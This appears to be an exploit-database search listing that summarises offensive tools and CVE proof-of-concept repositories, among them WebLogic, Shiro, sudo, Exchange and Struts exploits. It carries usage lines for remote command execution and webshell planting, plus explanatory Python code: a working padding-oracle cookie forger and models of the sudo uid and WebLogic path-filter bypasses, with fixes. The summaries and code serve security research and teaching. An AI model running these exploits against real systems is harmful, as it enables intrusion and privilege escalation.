1899 matches found
CMSmap
An offensive tool for web application security testing. No primary CVE ID is present in the provided context. The target product or framework is not explicitly stated, but the tool is designed for testing popular content management systems (CMSs) such as WordPress,...
Findsploit
An offensive tool for searching for and exploiting vulnerabilities. No primary CVE ID is explicitly mentioned in the provided context. Findsploit is a bash script that searches both local and online exploit databases. It includes three sub-scripts: compilesploit, which automatically compiles and r...
Exploit for CVE-2019-1322
Erebus is a Cobalt Strike post-exploitation plugin. Some features only work with Cobalt Strike 4.x. Because of asynchronous-processing issues, certain features may still have bugs for which no fix has been found yet; if anyone has a solution, please get in touch. Changelog 2020-10-19 V1.3.5 - added the badcmd command, based on badpotato - potatos privilege escalation: added badpotato - post module: added a SOCKS feature based on ew (see post----Socks tunnel) - removed the audit feature from the information-gathering module. Changelog 2020-07-31 V1.3.4 - added the fakelogonscreen command - added SpaceRunner...
Exploit for Use After Free in Microsoft
Batch detection tool for the Microsoft RDP (port 3389) remote vulnerability CVE-2019-0708 (BlueKeep). 0x001 Detection on Windows https://github.com/robertdavidgraham/rdpscan Directory of C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 2019/06/02 02:11 DIR . 2019/06/02 02:11 DIR .. 2019/06/02 01:55 2,582,016 libcrypto-11.dll 2019/06/02 01:57 619,520 libssl-11.dll 2019/06/02 02:04 172,03...
Exploit for Missing Authorization in Linuxfoundation Harbor
Ary is an integration tool, mainly used to call various security tools so as to form a convenient one-click penetration test. Version: 2.1.1 public edition. Author: Ali0th. Contact: [email protected]. Homepage: github.com/Martin2877. Disclaimer: this tool is for learning and testing only; illegal use is strictly prohibited, and the developer accepts no responsibility for users' illegal acts. Discussion: feel free to open an issue, or message me to join the tool's user group. Download: go to the releases page. Related documents: 我的一键 getshell 代码开发之路v1.8.pdf (my path to one-click getshell code development, v1.8). Features (note: some features are still in development) 0. Information-gathering tools (in development) 1. Batch-crawl matching websites through multiple cyberspace search engines, such as...
Exploit for CVE-2020-14882
CVE-2020-14882ALL is a combined exploitation tool for CVE-2020-14882 that supports command-echo detection, batch command echo, and command execution without echo via an external XML, among other features. Required modules: requests, http.client. (The tool is for authorized security testing only; do not use it illegally; violations have nothing to do with the author.) Versions confirmed working for the command-echo module: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0. Options. Function 1: command echo python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "net user" python3 CVE-2020-14882ALL.py -u...
pwntools
This repository is an open-source project for a Python library called pwntools, which is used for reverse engineering and exploitation of binaries. The library is designed to be a comprehensive tool for security researchers and developers. The repository contains a variety of files, including:...
Exploit for CVE-2019-1003000
PoC exploit for CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002: Script Security, Pipeline: Groovy, Pipeline: Declarative. This PoC allows users with Overall/Read permission and Job/Configure and optional Job/Build to bypass the sandbox protection and execute arbitrary code on the Jenkins...
Pwnable.kr-CTF-Writeups
This repository contains writeups for the Pwnable.kr CTF (Capture The Flag) challenges. The challenges involve exploiting vulnerabilities in various programs to obtain flags. The repository includes four writeups: 1. FD: this writeup involves exploiting a file descriptor vulnerability in a...
pocsuite_poc_collect
It is an offensive tool for vulnerability exploitation...
Exploit for Improper Authentication in Apache Shiro
Apache Shiro authentication bypass analysis (CVE-2020-17523) https://www.anquanke.com/post/id/230935 0x01 Vulnerability description: Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography and session management. With Shiro's easy-to-understand API you can quickly and easily secure any application, from the smallest mobile app to the largest web and enterprise applications. When Shiro is used together with Spring, under certain permission-matching rules an attacker can bypass authentication by constructing a specially crafted HTTP request. Affected versions: Apache Shiro before 1.7.1 (fixed in 1.7.1). 0x02 Lab environment setup shiro 1.7...
vulscan
This is a Python-based web application for vulnerability scanning and management. The application is built on Django and has several features, including: 1. Vulnerability scanning: the application can scan web applications for vulnerabilities using a variety of plugins (PoCs). 2. Plugin...
Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Redhat Jboss_Enterprise_Application_Platform
PoC exploit filed under CVE-2016-2183, although that identifier is the SWEET32 3DES birthday attack; the repository's own content is a padding oracle attack against Apache Shiro's AES-CBC rememberMe cookie. The exploit targets the remote code execution (RCE) vector: the padding oracle lets the attacker forge a ciphertext of their choosing without knowing the key, so that a serialized payload is accepted and deserialized by the server. The probable entry point is the shirooraclepadding.py script, which is...
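The forgery step the entry above describes, as an added worked example that is not the repository's shirooraclepadding.py: given only a server-side oracle that says whether a CBC ciphertext has valid PKCS#7 padding, recover the block cipher's intermediate values byte by byte and chain them backwards to build a ciphertext that decrypts to attacker-chosen plaintext. Shiro uses AES-CBC; here a constructed 4-round Feistel cipher stands in for AES so the example runs with the standard library only. The cookie contents and the CookieServer class are constructed for the demonstration.

```python
import hmac
import hashlib
import os

BLOCK = 16
ROUNDS = 4

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 128-bit block cipher (constructed stand-in for AES): a 4-round Feistel
# network keyed through HMAC-SHA256. The attack never looks inside it; any
# CBC-mode block cipher behaves identically at the oracle.
def _round(key, half, i):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _round(key, r, i))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _round(key, l, i)), l
    return l + r

# CBC with PKCS#7 padding, the construction a rememberMe-style cookie uses.
def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    padded, prev, out = pad(plaintext), iv, [iv]
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)  # IV || C1 || ... || Cn

def cbc_decrypt(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(_xor(block_decrypt(key, blocks[i]), blocks[i - 1])
                  for i in range(1, len(blocks)))
    return unpad(pt)

class CookieServer:
    """Holds the secret key. padding_ok() is the leak: a padding failure is
    distinguishable from every other decryption outcome."""
    def __init__(self):
        self.key = os.urandom(16)

    def padding_ok(self, ct):
        try:
            cbc_decrypt(self.key, ct)
            return True
        except ValueError:
            return False

    def load_cookie(self, ct):
        return cbc_decrypt(self.key, ct)

class PaddingOracleForger:
    """Encrypts attacker-chosen plaintext using nothing but the oracle."""
    def __init__(self, oracle):
        self.oracle = oracle
        self.queries = 0

    def _ask(self, probe, blk):
        self.queries += 1
        return self.oracle(probe + blk)

    def intermediate(self, blk):
        """Recover D_k(blk), last byte first: when the oracle accepts
        probe||blk, byte k of D_k(blk) XOR probe equals the pad value."""
        inter = bytearray(BLOCK)
        for k in range(BLOCK - 1, -1, -1):
            padv = BLOCK - k
            for g in range(256):
                probe = bytearray(BLOCK)
                for j in range(k + 1, BLOCK):
                    probe[j] = inter[j] ^ padv  # known bytes forced to padv
                probe[k] = g
                if not self._ask(bytes(probe), blk):
                    continue
                if k == BLOCK - 1:
                    # A last-byte hit may be a longer valid padding (0x02 0x02,
                    # ...). Disturb byte 14: only a genuine 0x01 survives.
                    probe[k - 1] ^= 0xFF
                    if not self._ask(bytes(probe), blk):
                        continue
                inter[k] = g ^ padv
                break
            else:
                raise RuntimeError("oracle never accepted a probe")
        return bytes(inter)

    def forge(self, plaintext):
        """Start from a random last block; C[i-1] = D_k(C[i]) XOR P[i]."""
        padded = pad(plaintext)
        blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
        cur = os.urandom(BLOCK)
        out = [cur]
        for p in reversed(blocks):
            cur = _xor(self.intermediate(cur), p)
            out.append(cur)
        return b"".join(reversed(out))  # IV || C1 || ... || Cn

def demo(plaintext=b"user=admin;role=superuser"):
    server = CookieServer()
    forger = PaddingOracleForger(server.padding_ok)
    forged = forger.forge(plaintext)
    return server.load_cookie(forged), forger.queries

if __name__ == "__main__":
    recovered, n = demo()
    print(recovered, "forged with", n, "oracle queries and no key")
```

The forger never decrypts anything itself; roughly 16 x 256 oracle queries per block are enough to encrypt any plaintext, which is why a decryption routine that reports padding errors separately from other failures (or lets them surface as a distinct exception or timing) hands out an encryption oracle. The fix is the one Shiro shipped: authenticate the cookie (GCM or encrypt-then-MAC) so a modified ciphertext is rejected before padding is ever examined.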
ysoserial
This is a Java-based tool called ysoserial, which generates payloads that exploit unsafe Java object deserialization. The payloads are built from gadget chains found in commonly bundled libraries and are designed to attack vulnerable Java applications. The tool ships a variety of payloads, including CommonsCollections1,...
Exploit for Deserialization of Untrusted Data in Fasterxml Jackson-Databind
CVE-2020-8840: FasterXML/jackson-databind remote code execution vulnerability. 0x00 Introduction: jackson-databind is a JSON processing library under the FasterXML project. 0x01 Vulnerability overview: on February 19, NVD published a security advisory disclosing a remote code execution vulnerability in jackson-databind caused by JNDI injection (CVE-2020-8840), with a CVSS score of 9.8...
vulhub1
This repository is an open-source collection of pre-built vulnerable docker environments, known as Vulhub. It is a collection of vulnerable environments for testing and learning purposes, with no pre-existing knowledge of docker required. The repository contains a variety of vulnerable...
Exploit for Off-by-one Error in Sudo_Project Sudo
This repository contains exploits for CVE-2021-3156 (Baron Samedit), a heap-based buffer overflow in sudo itself, not in the Linux kernel. The bug is an off-by-one in sudo's handling of command-line arguments: when sudoedit (sudo in shell mode) is given an argument ending in a lone backslash, the unescaping code reads past the end of the argument and copies more bytes than the heap buffer holds, which an unprivileged local user can turn into root privileges. The repository contains two exploit files: "exploit.c" a...
Exploit for Improper Handling of Exceptional Conditions in Sudo_Project Sudo
PoC exploit for CVE-2019-14287, a vulnerability in sudo before 1.8.28. When a sudoers rule lets a user run a command as any user except root (Runas ALL with !root), the user can bypass that blacklist, skip session PAM modules, and cause incorrect logging by invoking sudo with a crafted user ID such as -u#-1: sudo accepts it as a uid, and setresuid() treats (uid_t)-1 as "leave unchanged", so the command runs as root. The...
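The uid arithmetic behind the entry above, as an added example in Python that models the relevant C behaviour rather than reproducing sudo's source: the runas spec is parsed as a signed number and truncated to an unsigned 32-bit uid_t, a policy that only asks "is it 0?" lets 0xFFFFFFFF through, and setresuid(2) then leaves the (already root) effective uid untouched. The policy functions and simulate_sudo are this example's own simplified models.

```python
UID_T_MAX = 0xFFFFFFFF  # uid_t is an unsigned 32-bit integer on Linux
ROOT_UID = 0

def parse_runas_uid(spec):
    """Turn sudo's '-u #<n>' form into the uid_t it becomes in C: parsed as a
    signed decimal, then truncated to 32 bits, so '#-1' and '#4294967295'
    both yield 0xFFFFFFFF. (Modelled, not sudo's own parser.)"""
    if not spec.startswith("#"):
        raise ValueError("expected the numeric '#<uid>' form")
    return int(spec[1:], 10) & UID_T_MAX

def policy_allows_vulnerable(uid):
    """sudo < 1.8.28 (modelled): an 'ALL, !root' Runas list only checks whether
    the requested uid is 0. 0xFFFFFFFF is not 0, so it passes."""
    return uid != ROOT_UID

def policy_allows_fixed(uid):
    """sudo 1.8.28 (modelled): -1 / 4294967295 is never a valid target uid."""
    return uid != ROOT_UID and uid != UID_T_MAX

def effective_uid_after_setresuid(current_uid, requested_uid):
    """setresuid(2) semantics: an argument equal to (uid_t)-1 means
    'leave this id unchanged'."""
    return current_uid if requested_uid == UID_T_MAX else requested_uid

def simulate_sudo(spec, policy):
    """Return the uid the command would run as, or None if sudo refuses.
    sudo is setuid-root, so it is uid 0 at the moment it calls setresuid()."""
    uid = parse_runas_uid(spec)
    if not policy(uid):
        return None
    return effective_uid_after_setresuid(ROOT_UID, uid)

if __name__ == "__main__":
    for spec in ("#1000", "#-1", "#4294967295"):
        print(spec,
              "vulnerable ->", simulate_sudo(spec, policy_allows_vulnerable),
              "fixed ->", simulate_sudo(spec, policy_allows_fixed))
```

The same pattern (a sentinel value that one layer treats as data and the next layer treats as "no change") is worth checking for wherever a policy check and a privilege-dropping syscall are written against different integer types.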
Exploit for Off-by-one Error in Sudo_Project Sudo
This is a PoC exploit for CVE-2021-3156, a heap-based overflow vulnerability in sudo. The exploit is a C program that triggers the overflow through sudoedit and uses the corrupted heap to make sudo's NSS lookup load an attacker-controlled shared library, libnssX/P0PSH3LLZ.so.2, which the exploit builds alongside itself. The exploit can be built using the provided Makefile and run using the...
shadowbroker
This repository, lvxiao54/shadowbroker, contains a collection of exploits and tools, including the infamous Shadow Brokers dump. The primary focus of this repository is on exploiting vulnerabilities in various software and systems, particularly in the context of Windows and Linux. The repository...
dedecmscan
This is a Python-based vulnerability scanner for the DedeCMS platform. It is designed to identify potential vulnerabilities in the platform, including SQL injection, cross-site scripting (XSS), and other classes of attack. The scanner consists of several modules, each responsible for...
vulhub
This repository is an open-source collection of pre-built vulnerable Docker environments, referred to as 'Vulhub'. It is an offensive tool for web application security testing and vulnerability research. No single primary vulnerability is targeted; instead it contai...
Exploit for CVE-2020-14756
This is an exploit module for the CVE-2020-14756 vulnerability in Oracle WebLogic. The vulnerability allows for remote code execution RCE due to a deserialization issue in the coherence.jar library. The exploit is written in Python and uses the socket library to establish a connection to the...
CDK
This is an offensive tool for container penetration testing. CDK (Container Penetration Toolkit) is designed to offer stable exploitation in different slimmed-down containers without any OS dependency. The tool comes with useful net-tools and many PoCs/EXPs that help users escap...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
This is a proof-of-concept (PoC) exploit for CVE-2020-0796, also known as SMBGhost, a pre-authentication remote code execution vulnerability in the compression handling of Windows SMBv3.1.1. The exploit is written in Python and uses the SMB protocol to inject shellcode into the Windows kernel. The shellcode is generated from a...
Exploit for Improper Access Control in Elasticsearch
Bug reports are welcome. Current version: AssetScan V1.3. Timeline: initial release 2019-11-28, V1.0 written. Change 1: 2019-12-02, thanks to Shadow·J for reporting a file-import error on Kali. Change 2: 2019-12-03, V1.1 released, added ARP liveness detection (rolled back while a bug is tested). Change 3: 2019-12-04, V1.2 released, fixed errors in the vulnerability scripts and fixed the weblogic script. Change 4: 2019-12-05, V1.2 revised, thanks to sevck for design ideas and for pointing out code-style problems. Change 5: 2019-12-05, V1.2 revised, fixed an IP data-handling error. Change 6: 2019-12-19...
Exploit for Improper Initialization in Apple Ipados
This is a PoC exploit for CVE-2020-27950, a vulnerability in the macOS kernel that allows for a port pointer leak. The exploit targets the macOS kernel and leverages a vulnerability in the kalloc.1024 buffer to allocate a controlled buffer with a magic value. The exploit then creates an ipckmsg...
JNDIExploit
JNDIExploit is a tool for exploiting JNDI injection. It borrows heavily from the code of the Rogue JNDI project, supports planting an in-memory shell directly, integrates the common bypasses for newer JDK versions, and is suited to use alongside automated tools. Usage: run java -jar JNDIExploit.jar -h to see the parameter descriptions; the --ip parameter is required. Usage: java -jar JNDIExploit.jar options Options: -i, --ip Local ip address -l, --ldapPort Ldap bind port default: 1389 -p,...
Exploit for Improper Input Validation in Apache Unomi
PoC exploit for CVE-2020-13942, an unauthenticated RCE vulnerability through MVEL and OGNL injection in Apache Unomi. The exploit targets the context.js/json endpoint exposed by the Unomi server, allowing an attacker to execute arbitrary OS commands. Two RCE vectors are available: MVEL injection...
Exploit for CVE-2020-14644
It is an offensive tool for WebLogic. The repository contains a basic proof-of-concept PoC and exploit script for WebLogic, with the goal of creating a unified detection and exploitation tool. The script, named weblogicpoc.py, uses the T3 protocol to connect to a WebLogic server and exploit...
PrivescCheck
PrivescCheck is a PowerShell enumeration script rather than an exploit: it identifies common Windows security misconfigurations that can be leveraged for privilege escalation. It gathers various information that might be useful for exploitation and/or...
XSS_Bypass_Payload
An offensive tool for XSS testing. The repository contains a collection of XSS bypass payloads, used to get attacker-controlled script through web-application injection points past defenses such as Content Security Policy (CSP) and XSS filters...
Exploit for CVE-2020-16898
CVE-2020-16898 Windows TCP/IP remote code execution vulnerability: EXP and PoC reproduction. forforever: https://www.cnblogs.com/forforever/p/13846077.html PoC: CVE-2020-16898Checker-poc. Command (launch PowerShell/CMD as administrator): Powershell.exe -ExecutionPolicy UnRestricted -File .\CVE-2020-16898-poc.ps1 EXP: cve-2020-16898-exp2...
Exploit for CVE-2020-14882
CVE-2020-14882 WebLogic unauthenticated RCE: bypassing the patch for CVE-2020-14882. The patch adds a blacklist of URL fragments, private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", ""}; (list: %252E%252E %2E%2E .. %3E %3C ;), matched case-sensitively against the raw request path, so a lowercased double-encoded traversal is not caught: "%252E%252E%252F".lower() gives '%252e%252e%252f', and %252E%252E%252F to...
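Why the blacklist in the entry above fails, as an added example (this is not WebLogic's code; the matching behaviour around the quoted IllegalUrl list is modelled, and the /console/css/ public prefix and the hardened check are this example's own). The weak check decides on the raw, still-encoded path with a case-sensitive substring match; the hardened one decodes until the string is stable, normalizes dot-segments, and only then decides, so case and encoding depth no longer matter.

```python
import posixpath
from urllib.parse import unquote

# Blacklist as quoted on the page for the CVE-2020-14882 patch. How it is
# matched is modelled here, not copied from WebLogic.
ILLEGAL_URL = (";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E")

# Assumption for the example: console static resources under this prefix are
# served without login; everything else in /console/ requires authentication.
PUBLIC_PREFIX = "/console/css/"

def blacklist_filter(raw_path):
    """Patch-style check: case-sensitive substring match on the encoded path."""
    return not any(token in raw_path for token in ILLEGAL_URL)

def is_public_resource_weak(raw_path):
    """Weak authorization: trust the raw prefix plus the blacklist."""
    return raw_path.startswith(PUBLIC_PREFIX) and blacklist_filter(raw_path)

def fully_decode(raw_path, max_rounds=3):
    """Undo repeated percent-encoding until the string stops changing
    (%252E -> %2E -> '.'). Capped so hostile input cannot loop forever."""
    decoded = raw_path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded

def resolve_target(raw_path):
    """The path the server actually dispatches: decoded, then dot-segments
    collapsed, which is how /console/css/../console.portal reaches the console."""
    return posixpath.normpath(fully_decode(raw_path))

def is_public_resource_hardened(raw_path):
    """Hardened check (this example's own): reject traversal and metacharacters
    on the decoded form, then authorize the canonical path, not the raw one."""
    decoded = fully_decode(raw_path)
    if ".." in decoded or any(c in decoded for c in ";<>"):
        return False
    return resolve_target(raw_path).startswith(PUBLIC_PREFIX)

if __name__ == "__main__":
    for p in ("/console/css/main.css",
              "/console/css/%252E%252E%252Fconsole.portal",
              "/console/css/%252e%252e%252fconsole.portal"):
        print(p, "->", resolve_target(p),
              "weak:", is_public_resource_weak(p),
              "hardened:", is_public_resource_hardened(p))
```

The uppercase form is blocked by the blacklist and the lowercase form sails through, yet both resolve to the same /console/console.portal; a check that runs before canonicalization can only ever enumerate spellings, and the attacker picks the next one.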
Exploit for Path Traversal in Intelbras Tip200_Firmware
PoC exploit for CVE-2020-13886, a local file inclusion (LFI) vulnerability in Intelbras TIP 200/200 LITE/TIP 300 devices. The exploit targets the page parameter of /cgi-bin/cgiServer.exx, allowing an attacker to read sensitive files on the device. The poc.py script takes two user inputs: the URL...
Exploit for Improper Privilege Management in Microsoft
Intranet penetration study notes. Author: chriskali. GitHub: chriskaliX. I recently read Tencent Blue Army's "Red vs Blue: Windows Intranet Penetration" and learned a great deal. I plan to split it into chapters to organize and reproduce, mainly recording the knowledge I was missing. This is a mixed-bag article; the main thread follows jumbo's approach, and where something interests me I will expand on it. It may be a little disorganized, for which I apologize. 0x01 Environment setup: skipped; a brief description of the test environment follows. Hostname | IP address | Role | OS: DC | 10.10.10.10 | DC, DNS | Windows Server 2012; John | 10.10.10.11 | normal user | Win7...
blogpost_qiling_dlink_1
It is an offensive tool for exploiting vulnerabilities in software. The repository contains a Python script that exploits a vulnerability in a software product. The script is designed to be used by a penetration tester or a security researcher to test the security of the software. The script uses...
Exploit for CVE-2020-1034
This is a proof-of-concept (PoC) exploit for CVE-2020-1034, a Windows kernel elevation-of-privilege vulnerability in Event Tracing for Windows (ETW) that Microsoft fixed in its September 2020 security update. The exploit targets an unpatched Windows 10 2004, build 19041.488, an August 2020 build that predates the fix. The exploit code is written in C++ and uses the Windows API to manipulate the system's Event Tracing fo...
shellcode-x86_x64
This repository contains a collection of assembly code examples for a 64-bit Linux system, primarily focusing on basic instructions and operations. The code is written in NASM Netwide Assembler and covers various topics such as arithmetic, logical operations, string manipulation, and stack...
CDK
It is an offensive tool for container exploitation. The primary CVE ID is not explicitly stated in the provided context, but the tool is designed for container exploitation, which may involve various vulnerabilities. The tool, CDK, is a zero-dependency container penetration toolkit that offers...
Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software
PoC exploit for CVE-2020-3452, an unauthorized remote file reading vulnerability in Cisco Adaptive Security Appliance and FTD Software. The exploit uses Shodan to scan for vulnerable targets, then attempts to exploit the vulnerability by sending crafted HTTP requests to the identified targets. Th...
Exploit for CVE-2020-17008
CVE-2020-17008 splWOW64 elevation of privilege (C:\Windows\splwow64.exe). PoC from: https://bugs.chromium.org/p/project-zero/issues/detail?id=2096 0x01 Set splwow64poc.exe to Low integrity: cd splwow64poc\x64\Release, then icacls splwow64poc.exe /setintegritylevel L (per icacls, /setintegritylevel [CI][OI]level explicitly adds an integrity ACE...
Exploit for CVE-2020-17057
cve-2020-17057 PoC. Microsoft released a patch on 2020-11-10 that fixes...
Exploit for OS Command Injection in Sonatype Nexus_Repository_Manager
CVE-2019-5475 and CVE-2019-15588 lab: RCE command injection vulnerability ------ 0x00 Background: CVE-2019-5475 is an RCE command injection vulnerability in Nexus's built-in Yum Repository plugin. It was first disclosed on HackerOne; because the vendor's first fix was incomplete, CVE-2019-15588 was derived from it. Both vulnerabilities require logging in as admin before they can be exploited, but the default Nexus administrator password admin123 is frequently never changed, so they are easy to exploit in practice. 0x10 Lab environment 0x20 Directory structure CVE-2019-5475 ├──...
Exploit for CVE-2020-27949
This is a PoC exploit for CVE-2020-27949, a vulnerability in macOS's DTrace system that allows an attacker to read memory of other processes without elevated permissions. The exploit creates probes in the victim process using the /dev/fasttrap device, which lacks permission checks, allowing any...
Exploit for Improper Access Control in Xen
kernelexploitfactory (kept up to date): Linux kernel CVE exploit analysis reports together with the corresponding debug environments. You no longer need to compile the Linux kernel and configure your environment yourself; this repository extracts every Linux kernel exploit along with its debug environment. Testing is done on...
Exploit for OS Command Injection in Apache Struts
CVE-2020-26259: XStream 1.4.14 is vulnerable to arbitrary file deletion on the local host when unmarshalling, as long as the executing process has sufficient rights. Although this entry is indexed under Apache Struts, the affected component is the XStream library itself. https://x-stream.github.io/CVE-2020-26259.html Dependency in pom.xml: com.thoughtworks.xstream xstream 1.4.14 poc...
Exploit for Deserialization of Untrusted Data in Microsoft
This is a weaponized tool for exploiting the Microsoft Exchange 2010 MRM.AutoTag.Model unsafe deserialization vulnerability, CVE-2020-17144. The tool is written in C# (not C; the sources carry the .cs extension) against .NET Framework 3.5. It consists of two files: e.cs and cve-2020-17144.cs. The e.cs file is a simple C...
Exploit for Deserialization of Untrusted Data in Microsoft
CVE-2020-17144-EXP. Requirements: Exchange 2010; an ordinary user account. Default usage (writes a webshell): CVE-2020-17144-EXP.exe mail.example.com user pass. For command execution and port reuse, modify ExploitClass.cs. Reference: @zcgonvh...
Exploit for Expression Language Injection in Apache Struts
PoC exploit for CVE-2020-17530, an OGNL expression injection (forced double evaluation of attacker-controlled tag attributes) in Apache Struts 2.0.0 to 2.5.25; it is not a deserialization bug. The target product is Apache Struts, specifically the struts2showcasewar application. The vulnerability class is expression language injection, and the evaluated OGNL yields remote code execution. The probable entry...